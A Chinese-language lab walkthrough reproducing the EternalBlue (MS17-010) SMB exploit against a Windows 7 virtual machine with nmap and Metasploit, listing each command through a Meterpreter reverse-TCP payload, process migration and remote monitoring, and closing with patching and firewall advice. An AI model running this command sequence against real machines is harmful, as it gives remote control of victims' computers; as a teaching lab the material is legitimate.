0****1
永恒之蓝(ms17-010)漏洞复现
简介
今天提到的是已经过去很久的一个漏洞:永恒之蓝。这个漏洞是利用windows操作系统中SMB协议来获取操作系统最高权限的漏洞,。在2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,给广大电脑用户造成了巨大的经济损失,它的大小为3.3MB。所以今天来复现一下ms17-010这个漏洞,并通过这个漏洞来学习一下Metasploit(msf)这款渗透工具。
0****1
准备工作
靶机(windows7)ip:192.168.204.131
攻击机(kali)ip:192.168.204.130
因为这里我们用的都是虚拟机做的实验,所用的都是nat获取ip的方式,故都是192.168网段地址
0****2
漏洞利用
1、第一步我们需要使用nmap工具查看内网有没有我们攻击的靶机,如果有这个靶机,我们需要查看这个靶机是不是开启了139和445这个端口,因为这两个端口是SMB协议使用的端口。
命令1:nmap -sP 192.168.204.1/24 查看这个网段存活的主机。
这里可以检测到我们即将渗透的主机
命令2:nmap -O 192.168.204.131 检测主机运行的一些信息
这里可以看到主机的139和445端口是开启状态。
2、这里我们就需要用到msf工具来进行下一步的渗透测试了。
命令1:msfconsole 进入到msf控制台
当我们看到变成这样,就说明我们已经进入到msf控制台了。
命令2:search ms17-010 这是寻找关于这个漏洞可以用到的一些模块。因为我们这次测试的漏洞是永恒之蓝(ms17-010)所以我们需要寻找它的一些测试模块来进行后续的使用。
命令3:use exploit/windows/smb/ms17_010_eternalblue 这条命令是进入到我们即将使用的模块中,因为我们是渗透实验,所以我就不去探测主机了,因为它是百分之百可以渗透进去的。
当显示出我们需要用到的模块则说明已经成功进入到模块中。
命令4:show options 查看我们需要设置的一些选项。
这里可以看到一些我们需要设置的东西,如果它后面的需求required是yes,那就说明这个是我们必须要设置的。rhosts就是即将渗透的靶机的地址,lhosts是我们攻击机的地址,rport则是渗透的靶机的端口,lports就是我们的端口啦。
命令5:set rhosts 192.168.204.131设置靶机地址
然后在进行show options进行查看。
这里就能看到rhosts已经变成我们即将渗透的地址了。
命令7:set payload windows/x64/meterpreter/reverse_tcp
这里我们需要设置一些攻击载荷(攻击载荷是攻击者在目标系统上执行的一段攻击代码)因为我们的操作系统是64位的windows,所以设置的位这个攻击载荷,如果忘记了攻击载荷,可以使用search命令寻找,也可以用tab键进行补齐。
命令8:run或者exploit 攻击
当出现上面选中的反馈的时候就说明我们已经连接到主机了。
那就说明我们已经进入到主机了。
0****3
控制和降权
当我们进入到电脑以后,我们进入到的是最高权限的用户,但是使用者用到的可能不是最高权限的用户,这里我们就需要降权操作,以便查看使用信息。
命令1:getuid 查看现在的用户
这里显示我们现在所处的用户system
命令2:getpid 查看meterpreter shell的进程号
因为我们等下需要使用进程来降权,所以我们需要知道我们使用什么进程号上线的。
命令3:ps 并找到cmd.exe的进程号,cmd.exe是当前用户所使用的进程,所以我们使用ps命令查看所有进程,找到cmd.exe使用的进程号,然后进行注入操作
命令4:migrate 744 将我们的进程注入到744(cmd.exe)进程中然后在使用getuid查看我们所处的用户
这样我们就进入到了靶机使用者的用户了,然后我们就可以进行一些常用命令来监听这台靶机啦。。。
04****
监听
这里命令实在太多了,感兴趣的小伙伴可以百度查看一下。这里只是做了一个科普,所以这方面就不过多介绍啦。
这就可以监视到靶机啦!!!
这是一个很久之前的漏洞了,通过协议端口来进行操作系统的权限获取操作,所以说大家在使用电脑的时候,如果是不常用的高危漏洞尽可能在防火墙把它禁用掉,并安装杀毒软件来进行操作系统的安全加固。
网络不边界,安全有界限。
网络不是不法之地